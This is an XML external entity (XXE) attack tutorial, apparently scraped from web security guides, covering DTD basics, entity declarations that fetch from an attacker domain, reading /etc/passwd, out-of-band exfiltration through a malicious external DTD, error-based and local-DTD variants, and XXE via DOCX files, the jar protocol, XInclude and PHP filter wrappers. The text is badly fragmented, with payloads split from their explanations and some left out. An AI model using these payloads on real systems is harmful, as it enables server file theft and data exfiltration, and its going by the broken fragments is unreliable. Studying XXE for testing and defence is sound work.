<
and >
represent the characters <
and >
. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data.<!ELEMENT stockCheck ANY>
Means that any object could be inside the parent <stockCheck></stockCheck>
<stockCheck></stockCheck>
<stockCheck>
can have the children <productId>
and <storeId>
DOCTYPE
element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an "internal DTD") or can be loaded from elsewhere (known as an "external DTD") or can be hybrid of the two.<!DOCTYPE foo [ <!ENTITY myentity "my entity value" > ]>
&myentity;
within the XML document will be replaced with the defined value: "my entity value
".SYSTEM
keyword and must specify a URL from which the value of the entity should be loaded. For example:<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://normal-website.com" > ]>
file://
protocol, and so external entities can be loaded from file. For example:<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>
<!ENTITY % myparameterentity "my parameter entity value" >
%myparameterentity;
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>
xxe
and then uses the entity within the DTD. This will cause a DNS lookup and HTTP request to the attacker's domain, verifying that the attack was successful./etc/passwd
in different ways. For Windows you could try to read: C:\windows\system32\drivers\etc\hosts
Element stockCheck
as ANY/etc/hostname
file is as follows:file
, containing the contents of the /etc/passwd
file.eval
, containing a dynamic declaration of another XML parameter entity called exfiltrate
. The exfiltrate
entity will be evaluated by making an HTTP request to the attacker's web server containing the value of the file
entity within the URL query string.eval
entity, which causes the dynamic declaration of the exfiltrate
entity to be performed.exfiltrate
entity, so that its value is evaluated by requesting the specified URL.http://web-attacker.com/malicious.dtd
xxe
and then uses the entity within the DTD. This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline. The steps defined within the malicious DTD are then executed, and the /etc/passwd
file is transmitted to the attacker's server./etc/passwd
file using a malicious external DTD as follows:file
, containing the contents of the /etc/passwd
file.eval
, containing a dynamic declaration of another XML parameter entity called error
. The error
entity will be evaluated by loading a nonexistent file whose name contains the value of the file
entity.eval
entity, which causes the dynamic declaration of the error
entity to be performed.error
entity, so that its value is evaluated by attempting to load the nonexistent file, resulting in an error message containing the name of the nonexistent file, which is the contents of the /etc/passwd
file.eval
), but it is prohibited in the internal DTD. Therefore, you can't force an error without using an external DTD (usually)./usr/local/app/schema.dtd
, and this DTD file defines an entity called custom_entity
. An attacker can trigger an XML parsing error message containing the contents of the /etc/passwd
file by submitting a hybrid DTD like the following:local_dtd
, containing the contents of the external DTD file that exists on the server filesystem.custom_entity
, which is already defined in the external DTD file. The entity is redefined as containing the error-based XXE exploit that was already described, for triggering an error message containing the contents of the /etc/passwd
file.local_dtd
entity, so that the external DTD is interpreted, including the redefined value of the custom_entity
entity. This results in the desired error message./usr/share/yelp/dtd/docbookx.dtd
containing an entity called ISOamso
./unzipped/word/document.xml
in your favourite text editor (vim) and edit the XML to contain your favourite XXE payload. The first thing I try tends to be a HTTP request, like this:jar
protocol is only available on Java applications. It allows to access files inside a PKZIP file (.zip
, .jar
, ...) and works for local and remote files:https://download.host.com/myarchive.zip
/tmp/...
file.zip
slow_http_server.py
and one in javaslowserver.jar
.DOCTYPE
element. However, you might be able to use XInclude
instead. XInclude
is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude
attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.XInclude
attack, you need to reference the XInclude
namespace and provide the path to the file that you wish to include. For example:data://
protocol.file:/
you can use php wrappersphp://filter/convert.base64-encode/resource=
to access internal files.XLIFF (XML Localization Interchange File Format) is an XML-based bitext format created to standardize the way localizable data are passed between and among tools during a localization process and a common format for CAT tool exchange.
New Line
such as /etc/passwd
using the Out of Band technique.non-exist
file is reflected in the Error messages. Next is adding the File Content.